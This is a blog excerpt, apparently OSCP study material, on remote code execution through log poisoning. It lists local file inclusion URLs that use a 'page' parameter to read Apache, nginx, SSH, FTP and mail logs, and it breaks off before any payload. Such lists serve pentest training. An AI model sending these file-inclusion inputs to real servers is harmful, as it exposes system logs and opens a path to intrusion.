Author: MR X

Author | Cybersecurity enthusiast | Corporate trainer | Cybersecurity consultant | Speaker | OSCP | CISA | CCSP | ISO 27001 LA | OSWP | GPEN | GXPN | GCIH
OSCP Study materialAll Blog

RCE with log poisoning Attack Methodologies

Some of the important log files are the following :- http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/auth http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log […]